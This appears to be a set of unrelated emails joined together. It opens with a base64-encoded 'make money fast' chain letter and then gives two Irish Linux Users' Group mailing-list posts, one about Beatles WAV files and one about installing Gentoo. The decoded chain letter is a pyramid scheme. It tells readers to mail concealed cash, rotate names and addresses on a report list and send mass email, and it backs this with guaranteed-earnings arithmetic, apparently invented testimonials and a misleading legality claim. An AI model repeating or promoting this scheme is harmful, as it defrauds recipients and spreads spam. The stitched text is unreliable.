 ZSBvcmRlcmVkIGFsbCA1IHJlcG9ydHMsIHRha2UgdGhpcyBhZHZlcnRpc2Vt
 ZW50DQphbmQgUkVNT1ZFIHRoZSBuYW1lICYgYWRkcmVzcyBvZiB0aGUgcGVy
 c29uIGluIFJFUE9SVCAjIDUuIFRoaXMNCnBlcnNvbiBoYXMgbWFkZSBpdCB0
 aHJvdWdoIHRoZSBjeWNsZSBhbmQgaXMgbm8gZG91YnQgY291bnRpbmcNCnRo
 ZWlyIGZvcnR1bmUuDQoNCjIuIE1vdmUgdGhlIG5hbWUgJiBhZGRyZXNzIGlu
 IFJFUE9SVCAjIDQgZG93biBUTyBSRVBPUlQgIyA1Lg0KDQozLiBNb3ZlIHRo
 ZSBuYW1lICYgYWRkcmVzcyBpbiBSRVBPUlQgIyAzIGRvd24gVE8gUkVQT1JU
 ICMgNC4NCg0KNC4gTW92ZSB0aGUgbmFtZSAmIGFkZHJlc3MgaW4gUkVQT1JU
 ICMgMiBkb3duIFRPIFJFUE9SVCAjIDMuDQoNCjUuIE1vdmUgdGhlIG5hbWUg
 JiBhZGRyZXNzIGluIFJFUE9SVCAjIDEgZG93biBUTyBSRVBPUlQgIyAyDQoN
 CjYuIEluc2VydCBZT1VSIG5hbWUgJiBhZGRyZXNzIGluIHRoZSBSRVBPUlQg
 IyAxIFBvc2l0aW9uLg0KDQpQTEVBU0UgTUFLRSBTVVJFIHlvdSBjb3B5IGV2
 ZXJ5IG5hbWUgJiBhZGRyZXNzIEFDQ1VSQVRFTFkhIFRoaXMNCmlzIGNyaXRp
 Y2FsIHRvIFlPVVIgc3VjY2Vzcy4NCg0KPT09PT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCioqKiogVGFrZSB0aGlz
 IGVudGlyZSBsZXR0ZXIsIHdpdGggdGhlIG1vZGlmaWVkIGxpc3Qgb2YgbmFt
 ZXMsDQphbmQgc2F2ZSBpdCBvbiB5b3VyIGNvbXB1dGVyLiBETyBOT1QgTUFL
 RSBBTlkgT1RIRVIgQ0hBTkdFUy4NCg0KU2F2ZSB0aGlzIG9uIGEgZGlzayBh
 cyB3ZWxsIGp1c3QgaW4gY2FzZSBpZiB5b3UgbG9vc2UgYW55IGRhdGEuDQpU
 byBhc3Npc3QgeW91IHdpdGggbWFya2V0aW5nIHlvdXIgYnVzaW5lc3Mgb24g
 dGhlIGludGVybmV0LCB0aGUgNQ0KcmVwb3J0cyB5b3UgcHVyY2hhc2Ugd2ls
 bCBwcm92aWRlIHlvdSB3aXRoIGludmFsdWFibGUgbWFya2V0aW5nDQppbmZv
 cm1hdGlvbiB3aGljaCBpbmNsdWRlcyBob3cgdG8gc2VuZCBidWxrIGUtbWFp
 bHMgbGVnYWxseSwNCndoZXJlIHRvIGZpbmQgdGhvdXNhbmRzIG9mIGZyZWUg
 Y2xhc3NpZmllZCBhZHMgYW5kIG11Y2ggbW9yZS4NClRoZXJlIGFyZSAyIFBy
 aW1hcnkgbWV0aG9kcyB0byBnZXQgdGhpcyB2ZW50dXJlIGdvaW5nOg0KDQoN
 Cg0KIA0KTUVUSE9EICMgMTogQlkgU0VORElORyBCVUxLIEUtTUFJTCBMRUdB
 TExZDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
 PT09PT09PT09PQ0KDQpMZXQncyBzYXkgdGhhdCB5b3UgZGVjaWRlIHRvIHN0
 YXJ0IHNtYWxsLCBqdXN0IHRvIHNlZSBob3cgaXQNCmdvZXMsIGFuZCB3ZSB3
 aWxsIGFzc3VtZSB5b3UgYW5kIHRob3NlIGludm9sdmVkIHNlbmQgb3V0IG9u
 bHkNCjUsMDAwIGUtbWFpbHMgZWFjaC4gTGV0J3MgYWxzbyBhc3N1bWUgdGhh
 dCB0aGUgbWFpbGluZyByZWNlaXZlDQpvbmx5IGEgMC4yJSAoMi8xMCBvZiAx
 JSkgcmVzcG9uc2UgKHRoZSByZXNwb25zZSBjb3VsZCBiZSBtdWNoDQpiZXR0
 ZXIgYnV0IGxldHMganVzdCBzYXkgaXQgaXMgb25seSAwLjIlKS4gQWxzbyBt
 YW55IHBlb3BsZSB3aWxsDQpzZW5kIG91dCBodW5kcmVkcyBvZiB0aG91c2Fu
 ZHMgZS1tYWlscyBpbnN0ZWFkIG9mIG9ubHkgNSwwMDANCmVhY2gpLiBDb250
 aW51aW5nIHdpdGggdGhpcyBleGFtcGxlLCB5b3Ugc2VuZCBvdXQgb25seSA1
 LDAwMA0KZS1tYWlscy4NCg0KV2l0aCBhIDAuMiUgcmVzcG9uc2UsIHRoYXQg
 aXMgb25seSAxMCBvcmRlcnMgZm9yIHJlcG9ydCAjIDEuDQpUaG9zZSAxMCBw
 ZW9wbGUgcmVzcG9uZGVkIGJ5IHNlbmRpbmcgb3V0IDUsMDAwIGUtbWFpbCBl
 YWNoIGZvciBhDQp0b3RhbCBvZiA1MCwwMDAuIE91dCBvZiB0aG9zZSA1MCww
 MDAgZS1tYWlscyBvbmx5IDAuMiUgcmVzcG9uZGVkDQp3aXRoIG9yZGVycy4g
 VGhhdCdzPTEwMCBwZW9wbGUgcmVzcG9uZGVkIGFuZCBvcmRlcmVkIFJlcG9y
 dCAjIDIuDQoNCg0KVGhvc2UgMTAwIHBlb3BsZSBtYWlsIG91dCA1LDAwMCBl
 LW1haWxzIGVhY2ggZm9yIGEgdG90YWwgb2YNCjUwMCwwMDAgZS1tYWlscy4g
 VGhlIDAuMiUgcmVzcG9uc2UgdG8gdGhhdCBpcyAxMDAwIG9yZGVycyBmb3IN
 ClJlcG9ydCAjIDMuDQoNClRob3NlIDEwMDAgcGVvcGxlIHNlbmQgNSwwMDAg
 ZS1tYWlscyBlYWNoIGZvciBhIHRvdGFsIG9mIDUNCm1pbGxpb24gZS1tYWls
 cyBzZW50IG91dC4gVGhlIDAuMiUgcmVzcG9uc2UgaXMgMTAsMDAwIG9yZGVy
 cyBmb3INClJlcG9ydCAjIDQuDQoNClRob3NlIDEwLDAwMCBwZW9wbGUgc2Vu
 ZCBvdXQgNSwwMDAgZS1tYWlscyBlYWNoIGZvciBhIHRvdGFsIG9mDQo1MCww
 MDAsMDAwICg1MCBtaWxsaW9uKSBlLW1haWxzLiBUaGUgMC4yJSByZXNwb25z
 ZSB0byB0aGF0IGlzDQoxMDAsMDAwIG9yZGVycyBmb3IgUmVwb3J0ICMgNS4N
 Cg0KVEhBVCdTIDEwMCwwMDAgT1JERVJTIFRJTUVTICQ1IEVBQ0ggPSAkNTAw
 LDAwMC4wMCAoaGFsZiBhIG1pbGxpb24NCmRvbGxhcnMpLg0KDQpZb3VyIHRv
 dGFsIGluY29tZSBpbiB0aGlzIGV4YW1wbGUgaXM6IDEuLi4uLiAkNTAgKyAy
 Li4uLi4gJDUwMCArDQozLi4uLi4gJDUsMDAwICsgNC4uLi4uICQ1MCwwMDAg
 KyA1Li4uLiAkNTAwLDAwMCAuLi4uIEdyYW5kDQpUb3RhbD0kNTU1LDU1MC4w
 MA0KDQpOVU1CRVJTIERPIE5PVCBMSUUuIEdFVCBBIFBFTkNJTCAmIFBBUEVS
 IEFORCBGSUdVUkUgT1VUIFRIRSBXT1JTVA0KUE9TU0lCTEUgUkVTUE9OU0VT
 IEFORCBOTyBNQVRURVIgSE9XIFlPVSBDQUxDVUxBVEUgSVQsIFlPVSBXSUxM
 DQpTVElMTCBNQUtFIEEgTE9UIE9GIE1PTkVZIQ0KPT09PT09PT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCg0KUkVNRU1C
 RVIgRlJJRU5ELCBUSElTIElTIEFTU1VNSU5HIE9OTFkgMTAgUEVPUExFIE9S
 REVSSU5HIE9VVCBPRg0KNSwwMDAgWU9VIE1BSUxFRCBUTy4gRGFyZSB0byB0
 aGluayBmb3IgYSBtb21lbnQgd2hhdCB3b3VsZCBoYXBwZW4NCmlmIGV2ZXJ5
 b25lIG9yIGhhbGYgb3IgZXZlbiBvbmUgNHRoIG9mIHRob3NlIHBlb3BsZSBt
 YWlsZWQNCjEwMCwwMDAgZS1tYWlscyBlYWNoIG9yIG1vcmU/IFRoZXJlIGFy
 ZSBvdmVyIDE1MCBtaWxsaW9uIHBlb3BsZQ0Kb24gdGhlIEludGVybmV0IHdv
 cmxkd2lkZSBhbmQgY291bnRpbmcsIHdpdGggdGhvdXNhbmRzIG1vcmUNCmNv
 bWluZyBvbiBsaW5lIGV2ZXJ5IGRheS4gQmVsaWV2ZSBtZSwgbWFueSBwZW9w
 bGUgd2lsbCBkbyBqdXN0DQp0aGF0LCBhbmQgbW9yZSENCg0KTUVUSE9EICMg
 MjogQlkgUExBQ0lORyBGUkVFIEFEUyBPTiBUSEUgSU5URVJORVQNCj09PT09
 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
 DQoNCkFkdmVydGlzaW5nIG9uIHRoZSBuZXQgaXMgdmVyeSwgdmVyeSBpbmV4
 cGVuc2l2ZSBhbmQgdGhlcmUgYXJlDQpodW5kcmVkcyBvZiBGUkVFIHBsYWNl
 cyB0byBhZHZlcnRpc2UuIFBsYWNpbmcgYSBsb3Qgb2YgZnJlZSBhZHMNCm9u
 IHRoZSBJbnRlcm5ldCB3aWxsIGVhc2lseSBnZXQgYSBsYXJnZXIgcmVzcG9u
 c2UuIFdlIHN0cm9uZ2x5DQpzdWdnZXN0IHlvdSBzdGFydCB3aXRoIE1ldGhv
 ZCAjIDEgYW5kIGFkZCBNRVRIT0QgIzIgYXMgeW91IGdvDQphbG9uZy4gRm9y
 IGV2ZXJ5ICQ1IHlvdSByZWNlaXZlLCBhbGwgeW91IG11c3QgZG8gaXMgZS1t
 YWlsIHRoZW0NCnRoZSBSZXBvcnQgdGhleSBvcmRlcmVkLiBUaGF0J3MgaXQu
 IEFsd2F5cyBwcm92aWRlIHNhbWUgZGF5DQpzZXJ2aWNlIG9uIGFsbCBvcmRl
 cnMuDQoNClRoaXMgd2lsbCBndWFyYW50ZWUgdGhhdCB0aGUgZS1tYWlsIHRo
 ZXkgc2VuZCBvdXQsIHdpdGggeW91ciBuYW1lDQphbmQgYWRkcmVzcyBvbiBp
 dCwgd2lsbCBiZSBwcm9tcHQgYmVjYXVzZSB0aGV5IGNhbiBub3QgYWR2ZXJ0
 aXNlDQp1bnRpbCB0aGV5IHJlY2VpdmUgdGhlIHJlcG9ydC4NCg0KPT09PT09
 PT09PT1BVkFJTEFCTEUgUkVQT1JUUyA9PT09PT09PT09PT09PT09PT09PQ0K
 VGhlIHJlYXNvbiBmb3IgdGhlICJjYXNoIiBpcyBub3QgYmVjYXVzZSB0aGlz
 IGlzIGlsbGVnYWwgb3INCnNvbWVob3cgIndyb25nIi4gSXQgaXMgc2ltcGx5
 IGFib3V0IHRpbWUuIFRpbWUgZm9yIGNoZWNrcyBvcg0KY3JlZGl0IGNhcmRz
 IHRvIGJlIGNsZWFyZWQgb3IgYXBwcm92ZWQsIGV0Yy4gQ29uY2VhbGluZyBp
 dCBpcw0Kc2ltcGx5IHNvIG5vIG9uZSBjYW4gU0VFIHRoZXJlIGlzIG1vbmV5
 IGluIHRoZSBlbnZlbG9wZSBhbmQgc3RlYWwNCml0IGJlZm9yZSBpdCBnZXRz
 IHRvIHlvdS4NCg0KT1JERVIgRUFDSCBSRVBPUlQgQlkgSVRTIE5VTUJFUiAm
 IE5BTUUgT05MWS4gTm90ZXM6IEFsd2F5cyBzZW5kDQokNSBjYXNoIChVLlMu
 IENVUlJFTkNZKSBmb3IgZWFjaCBSZXBvcnQuIENoZWNrcyBOT1QgYWNjZXB0
 ZWQuDQpNYWtlIHN1cmUgdGhlIGNhc2ggaXMgY29uY2VhbGVkIGJ5IHdyYXBw
 aW5nIGl0IGluIGF0IGxlYXN0IDINCnNoZWV0cyBvZiBwYXBlci4gT24gb25l
 IG9mIHRob3NlIHNoZWV0cyBvZiBwYXBlciwgd3JpdGUgdGhlDQpOVU1CRVIg
 JiB0aGUgTkFNRSBvZiB0aGUgUmVwb3J0IHlvdSBhcmUgb3JkZXJpbmcsIFlP
 VVIgRS1NQUlMDQpBRERSRVNTIGFuZCB5b3VyIG5hbWUgYW5kIHBvc3RhbCBh
 ZGRyZXNzLg0KDQoNCiANCiANCg0KUExBQ0UgWU9VUiBPUkRFUiBGT1IgVEhF
 U0UgUkVQT1JUUyBOT1c6DQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT09PQ0KUkVQT1JUIyAxOiBUaGUgSW5zaWRl
 cidzIEd1aWRlIFRvIEFkdmVydGlzaW5nIGZvciBGcmVlIE9uIFRoZSBOZXQN
 Cg0KICAgIE9yZGVyIFJlcG9ydCAjMSBmcm9tDQogICAgIERhdmUgRHJ5ZGVu
 DQogICAgICBQLk8uIEJveCA0NTQNCiAgICAgIERyZXhlbCBIaWxsICBQQS4g
 DQogICAgICAxOTAyNiAgIFVTQQ0KDQpfX19fX19fX19fX19fX19fX19fX19f
 X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fDQoNCg0KDQpSRVBP
 UlQgIyAyOiBUaGUgSW5zaWRlcidzIEd1aWRlIFRvIFNlbmRpbmcgQnVsayBF
 bWFpbCBPbiBUaGUgTmV0DQoNCk9yZGVyIFJlcG9ydCAjIDIgZnJvbToNCg0K
 ICAgICBNQyBFbnRlcnByaXNlDQogICAgIDMxNDAgU28uIFBlb3JpYSAjIDEz
 OQ0KICAgICBBdXJvcmEgQ08uIA0KICAgICA4MDAxNCAtIDMxNTUgICBVU0EN
 Cl9fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f
 X19fX19fX19fX19fX19fX19fX19fDQoNClJFUE9SVCAjIDM6IFNlY3JldCBU
 byBNdWx0aWxldmVsIE1hcmtldGluZyBPbiBUaGUgTmV0DQoNCiAgIE9yZGVy
 IFJlcG9ydCAjIDMgZnJvbToNCiAgIEpheSBMb25nZmllbGQgDQogICA1NDUz
 IFNvLiBPbGl2ZSBTdC4NCiAgIEdyZWVud29vZCBWaWxsYWdlIENvLg0KICAg
 ODAxMTEgICBVU0ENCl9fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f
 X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX18NCg0KUkVQT1JU
 ICMgNDogSG93IFRvIEJlY29tZSBBIE1pbGxpb25haXJlIFVzaW5nICBNTE0g
 JiBUaGUgTmV0DQpPcmRlciBSZXBvcnQgIyA1IEZyb206DQoNCiAgICAgIEsu
 IFJ5bA0KICAgICAgMjEzNCBTby4gRWFnbGUgQ3QuDQogICAgIEF1cm9yYSBD
 by4NCiAgICAgODAwMTQNCiAgICAgVVNBDQoNCg0KIF9fX19fX19fX19fX19f
 X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX18NCg0K
 UkVQT1JUICM1OiBIb3cgVG8gU2VuZCBPdXQgT25lIE1pbGxpb24gRW1haWxz
 IEZvciBGcmVlDQoNCk9yZGVyIFJlcG9ydCAjIDUgRnJvbToNCg0KICAgQWxl
 eCBCdWtpbg0KICAzOTggTWFpbiBTdHJlZXQNCiAgTmFzaHVhIE5ILg0KICAw
 MzA2MA0KICAgVVNBDQpfX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f
 X19fX19fX19fX19fX19fX18NCg0KIA0KJCQkJCQkJCQkIFlPVVIgU1VDQ0VT
 UyBHVUlERUxJTkVTICQkJCQkJCQkJCQkDQoNCkZvbGxvdyB0aGVzZSBndWlk
 ZWxpbmVzIHRvIGd1YXJhbnRlZSB5b3VyIHN1Y2Nlc3M6DQoNCj09PSBJZiB5
 b3UgZG8gbm90IHJlY2VpdmUgYXQgbGVhc3QgMTAgb3JkZXJzIGZvciBSZXBv
 cnQgIzEgd2l0aGluDQoyIHdlZWtzLCBjb250aW51ZSBzZW5kaW5nIGUtbWFp
 bHMgdW50aWwgeW91IGRvLg0KDQo9PT0gQWZ0ZXIgeW91IGhhdmUgcmVjZWl2
 ZWQgMTAgb3JkZXJzLCAyIHRvIDMgd2Vla3MgYWZ0ZXIgdGhhdA0KeW91IHNo
 b3VsZCByZWNlaXZlIDEwMCBvcmRlcnMgb3IgbW9yZSBmb3IgUkVQT1JUICMg
 Mi4gSWYgeW91IGRpZA0Kbm90LCBjb250aW51ZSBhZHZlcnRpc2luZyBvciBz
 ZW5kaW5nIGUtbWFpbHMgdW50aWwgeW91IGRvLg0KDQoqKk9uY2UgeW91IGhh
 dmUgcmVjZWl2ZWQgMTAwIG9yIG1vcmUgb3JkZXJzIGZvciBSZXBvcnQgIyAy
 LCBZT1UNCkNBTiBSRUxBWCwgYmVjYXVzZSB0aGUgc3lzdGVtIGlzIGFscmVh
 ZHkgd29ya2luZyBmb3IgeW91LCBhbmQgdGhlDQpjYXNoIHdpbGwgY29udGlu
 dWUgdG8gcm9sbCBpbiAhIFRISVMgSVMgSU1QT1JUQU5UIFRPIFJFTUVNQkVS
 Og0KRXZlcnkgdGltZSB5b3VyIG5hbWUgaXMgbW92ZWQgZG93biBvbiB0aGUg
 bGlzdCwgeW91IGFyZSBwbGFjZWQgaW4NCmZyb250IG9mIGEgRGlmZmVyZW50
 IHJlcG9ydC4NCg0KWW91IGNhbiBLRUVQIFRSQUNLIG9mIHlvdXIgUFJPR1JF
 U1MgYnkgd2F0Y2hpbmcgd2hpY2ggcmVwb3J0DQpwZW9wbGUgYXJlIG9yZGVy
 aW5nIGZyb20geW91LiBJRiBZT1UgV0FOVCBUTyBHRU5FUkFURSBNT1JFIElO
 Q09NRQ0KU0VORCBBTk9USEVSIEJBVENIIE9GIEUtTUFJTFMgQU5EIFNUQVJU
 IFRIRSBXSE9MRSBQUk9DRVNTIEFHQUlOLg0KDQpUaGVyZSBpcyBOTyBMSU1J
 VCB0byB0aGUgaW5jb21lIHlvdSBjYW4gZ2VuZXJhdGUgZnJvbSB0aGlzDQpi
 dXNpbmVzcyAhISEgPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT09PT09PQ0KDQpGT0xMT1dJTkcgSVMgQSBOT1RFIEZST00g
 VEhFIE9SSUdJTkFUT1IgT0YgVEhJUyBQUk9HUkFNOiANCllvdSBoYXZlIGp1
 c3QgcmVjZWl2ZWQgaW5mb3JtYXRpb24gdGhhdCBjYW4gZ2l2ZSB5b3UgZmlu
 YW5jaWFsIGZyZWVkb20gZm9yDQp0aGUgcmVzdCBvZiB5b3VyIGxpZmUsIHdp
 dGggTk8gUklTSyBhbmQgSlVTVCBBIExJVFRMRSBCSVQgT0YNCkVGRk9SVC4g
 WW91IGNhbiBtYWtlIG1vcmUgbW9uZXkgaW4gdGhlIG5leHQgZmV3IHdlZWtz
 IGFuZCBtb250aHMNCnRoYW4geW91IGhhdmUgZXZlciBpbWFnaW5lZC4gRm9s
 bG93IHRoZSBwcm9ncmFtIEVYQUNUTFkgQVMNCklOU1RSVUNURUQuIERvIE5v
 dCBjaGFuZ2UgaXQgaW4gYW55IHdheS4gSXQgd29ya3MgZXhjZWVkaW5nbHkN
 CndlbGwgYXMgaXQgaXMgbm93Lg0KUmVtZW1iZXIgdG8gZS1tYWlsIGEgY29w
 eSBvZiB0aGlzIGV4Y2l0aW5nIHJlcG9ydCBhZnRlciB5b3UgaGF2ZQ0KcHV0
 IHlvdXIgbmFtZSBhbmQgYWRkcmVzcyBpbiBSZXBvcnQgIzEgYW5kIG1vdmVk
 IG90aGVycyB0byAjMg0KLi4uLiMgNSBhcyBpbnN0cnVjdGVkIGFib3ZlLiBP
 bmUgb2YgdGhlIHBlb3BsZSB5b3Ugc2VuZCB0aGlzIHRvDQptYXkgc2VuZCBv
 dXQgMTAwLDAwMCBvciBtb3JlIGUtbWFpbHMgYW5kIHlvdXIgbmFtZSB3aWxs
 IGJlIG9uDQpldmVyeSBvbmUgb2YgdGhlbS4gUmVtZW1iZXIgdGhvdWdoLCB0
 aGUgbW9yZSB5b3Ugc2VuZCBvdXQgdGhlDQptb3JlIHBvdGVudGlhbCBjdXN0
 b21lcnMgeW91IHdpbGwgcmVhY2guIFNvIG15IGZyaWVuZCwgSSBoYXZlDQpn
 aXZlbiB5b3UgdGhlIGlkZWFzLCBpbmZvcm1hdGlvbiwgbWF0ZXJpYWxzIGFu
 ZCBvcHBvcnR1bml0eSB0bw0KYmVjb21lIGZpbmFuY2lhbGx5IGluZGVwZW5k
 ZW50LiBJVCBJUyBVUCBUTyBZT1UgTk9XICENCg0KPT09PT09PT09PT09PU1P
 UkUgVEVTVElNT05JQUxTPT09PT09PT09PT09PT09DQoNCicnIE15IG5hbWUg
 aXMgTWl0Y2hlbGwuIE15IHdpZmUsIEpvZHkgYW5kIEkgbGl2ZSBpbiBDaGlj
 YWdvLiBJIGFtDQphbiBhY2NvdW50YW50IHdpdGggYSBtYWpvciBVLlMuIENv
 cnBvcmF0aW9uIGFuZCBJIG1ha2UgcHJldHR5DQpnb29kIG1vbmV5LiBXaGVu
 IEkgcmVjZWl2ZWQgdGhpcyBwcm9ncmFtIEkgZ3J1bWJsZWQgdG8gSm9keSBh
 Ym91dA0KcmVjZWl2aW5nICcnanVuayBtYWlsJycuIEkgbWFkZSBmdW4gb2Yg
 dGhlIHdob2xlIHRoaW5nLCBzcG91dGluZw0KbXkga25vd2xlZGdlIG9mIHRo
 ZSBwb3B1bGF0aW9uIGFuZCBwZXJjZW50YWdlcyBpbnZvbHZlZC4gSQ0KJydr
 bmV3JycgaXQgd291bGRuJ3Qgd29yay4gSm9keSB0b3RhbGx5IGlnbm9yZWQg
 bXkgc3VwcG9zZWQNCmludGVsbGlnZW5jZSBhbmQgZmV3IGRheXMgbGF0ZXIg
 c2hlIGp1bXBlZCBpbiB3aXRoIGJvdGggZmVldC4gSQ0KbWFkZSBtZXJjaWxl
 c3MgZnVuIG9mIGhlciwgYW5kIHdhcyByZWFkeSB0byBsYXkgdGhlIG9sZCAn
 J0kgdG9sZA0KeW91IHNvJycgb24gaGVyIHdoZW4gdGhlIHRoaW5nIGRpZG4n
 dCB3b3JrLiBXZWxsLCB0aGUgbGF1Z2ggd2FzDQpvbiBtZSEgV2l0aGluIDMg
 d2Vla3Mgc2hlIGhhZCByZWNlaXZlZCA1MCByZXNwb25zZXMuIFdpdGhpbiB0
 aGUNCm5leHQgNDUgZGF5cyBzaGUgaGFkIHJlY2VpdmVkIHRvdGFsICQgMTQ3
 LDIwMC4wMCAuLi4uLi4uLi4gYWxsDQpjYXNoISBJIHdhcyBzaG9ja2VkLiBJ
 IGhhdmUgam9pbmVkIEpvZHkgaW4gaGVyICcnaG9iYnknJy4NCiBNaXRjaGVs
 bCAgV29sZiBDLlAuQS4sIENoaWNhZ28sIElsbGlub2lzDQo9PT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQoNCg0K
 JycgTm90IGJlaW5nIHRoZSBnYW1ibGluZyB0eXBlLCBpdCB0b29rIG1lIHNl
 dmVyYWwgd2Vla3MgdG8gbWFrZQ0KdXAgbXkgbWluZCB0byBwYXJ0aWNpcGF0
 ZSBpbiB0aGlzIHBsYW4uIEJ1dCBjb25zZXJ2YXRpdmUgYXMgSSBhbSwNCkkg
 ZGVjaWRlZCB0aGF0IHRoZSBpbml0aWFsIGludmVzdG1lbnQgd2FzIHNvIGxp
 dHRsZSB0aGF0IHRoZXJlDQp3YXMganVzdCBubyB3YXkgdGhhdCBJIHdvdWxk
 bid0IGdldCBlbm91Z2ggb3JkZXJzIHRvIGF0IGxlYXN0IGdldA0KbXkgbW9u
 ZXkgYmFjaycnLiAnJyBJIHdhcyBzdXJwcmlzZWQgd2hlbiBJIGZvdW5kIG15
 IG1lZGl1bSBzaXplDQpwb3N0IG9mZmljZSBib3ggY3JhbW1lZCB3aXRoIG9y
 ZGVycy4gSSBtYWRlICQzMTksMjEwLjAwIGluIHRoZQ0KZmlyc3QgMTIgd2Vl
 a3MuIFRoZSBuaWNlIHRoaW5nIGFib3V0IHRoaXMgZGVhbCBpcyB0aGF0IGl0
 IGRvZXMNCm5vdCBtYXR0ZXIgd2hlcmUgcGVvcGxlIGxpdmUuIFRoZXJlIHNp
 bXBseSBpc24ndCBhIGJldHRlcg0KaW52ZXN0bWVudCB3aXRoIGEgZmFzdGVy
 IHJldHVybiBhbmQgc28gYmlnJycuICBEYW4gU29uZHN0cm9tLA0KQWxiZXJ0
 YSwgQ2FuYWRhIA0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT09PT09PQ0KJycgSSBoYWQgcmVjZWl2ZWQgdGhpcyBwcm9n
 cmFtIGJlZm9yZS4gSSBkZWxldGVkIGl0LCBidXQgbGF0ZXIgSQ0Kd29uZGVy
 ZWQgaWYgSSBzaG91bGQgaGF2ZSBnaXZlbiBpdCBhIHRyeS4gT2YgY291cnNl
 LCBJIGhhZCBubw0KaWRlYSB3aG8gdG8gY29udGFjdCB0byBnZXQgYW5vdGhl
 ciBjb3B5LCBzbyBJIGhhZCB0byB3YWl0IHVudGlsIEkNCndhcyBlLW1haWxl
 ZCBhZ2FpbiBieSBzb21lb25lIGVsc2UuLi4uLi4uLi4xMSBtb250aHMgcGFz
 c2VkIHRoZW4NCml0IGx1Y2tpbHkgY2FtZSBhZ2Fpbi4uLi4uLiBJIGRpZCBu
 b3QgZGVsZXRlIHRoaXMgb25lISBJIG1hZGUNCm1vcmUgdGhhbiAkNDkwLDAw
 MCBvbiBteSBmaXJzdCB0cnkgYW5kIGFsbCB0aGUgbW9uZXkgY2FtZSB3aXRo
 aW4NCjIyIHdlZWtzJycuIFN1c2FuIERlIFN1emEsIE5ldyBZb3JrLCBOLlku
 DQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
 PT09PT09DQonJyBJdCByZWFsbHkgaXMgYSBncmVhdCBvcHBvcnR1bml0eSB0
 byBtYWtlIHJlbGF0aXZlbHkgZWFzeSBtb25leQ0Kd2l0aCBsaXR0bGUgY29z
 dCB0byB5b3UuIEkgZm9sbG93ZWQgdGhlIHNpbXBsZSBpbnN0cnVjdGlvbnMN
 CmNhcmVmdWxseSBhbmQgd2l0aGluIDEwIGRheXMgdGhlIG1vbmV5IHN0YXJ0
 ZWQgdG8gY29tZSBpbi4gTXkNCmZpcnN0IG1vbnRoIEkgbWFkZSAkIDIwLCA1
 NjAuMDAgYW5kIGJ5IHRoZSBlbmQgb2YgdGhpcmQgbW9udGggbXkNCnRvdGFs
 IGNhc2ggY291bnQgd2FzICQgMzYyLDg0MC4wMC4gTGlmZSBpcyBiZWF1dGlm
 dWwsIFRoYW5rcyB0bw0KaW50ZXJuZXQnJy4gRnJlZCBEZWxsYWNhLCBXZXN0
 cG9ydCwgTmV3IFplYWxhbmQNCj09PT09PT09PT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT09PT0NCk9SREVSIFlPVVIgUkVQT1JUUyBU
 T0RBWSBBTkQgR0VUIFNUQVJURUQgT04gWU9VUiBST0FEIFRPDQpGSU5BTkNJ
 QUwgRlJFRURPTSAhDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT09PT09PT09DQpJZiB5b3UgaGF2ZSBhbnkgcXVlc3Rpb25z
 IG9mIHRoZSBsZWdhbGl0eSBvZiB0aGlzIHByb2dyYW0sDQpjb250YWN0IHRo
 ZSBPZmZpY2Ugb2YgQXNzb2NpYXRlIERpcmVjdG9yIGZvciBNYXJrZXRpbmcg
 UHJhY3RpY2VzLA0KRmVkZXJhbCBUcmFkZSBDb21taXNzaW9uLCBCdXJlYXUg
 b2YgQ29uc3VtZXIgUHJvdGVjdGlvbiwgYW5kDQpXYXNoaW5ndG9uLCBELkMu
 DQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
 PT09PT09DQpPTkUgVElNRSBNQUlMSU5HLCBOTyBORUVEIFRPIFJFTU9WRQ0K
 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
 PT09PQ0KDQoNCjYyMDhueGlpMS0yOTVVa09mNmwxNw==
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] RE: When is a WAV not a WAV? ANS: It is?!?
</t>
  </si>
  <si>
    <t xml:space="preserve">Well, after playing around with these strange wav files I realised I didn't 
 even have sox installed. A quick apt-get install sox fixed this.
 Sox does reconise these AND even plays them in stereo! Following info from 
 the CD-Writing HOW-TO I used sox to convert the Sgt Pepper's wav to cdr and 
 wrote it to CD and now I've got a CD with ONE track that is the entire Sgt 
 Peppers Album! Not too sure how over 500M of cdr reduces to only 51M of wav 
 file but there it is?!?!
 And I've got loads of Beatles Albums and singles in these strange wav files!
 KEWL! Now I don't need to go buying them!
 Cheers,
 	John Gay
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Gentoo Linux
</t>
  </si>
  <si>
    <t xml:space="preserve">Mark Page &lt;mpage@esatclear.ie&gt; printfd
 APOLOGIES IN ADVANCE FOR 80 CHAR LINES IN WEB MAIL (will get a mail client for this soon, honest)
 &gt; Has anybody on the list installed/used this distro? If so wouldn't mind a bit 
 &gt; of help.
 &gt; 
 &gt;  Burnt the ISO's from the latest Linux Format magazine. Took a couple of 
 &gt; attempts to install but got there. My problem - I have a standard dial-up 
 &gt; modem and the installation gives you the network card setup so internet 
 &gt; download is out of the question, but, I installed the Stage3 tarball which 
 &gt; puts the .tgz files on your harddrive. 
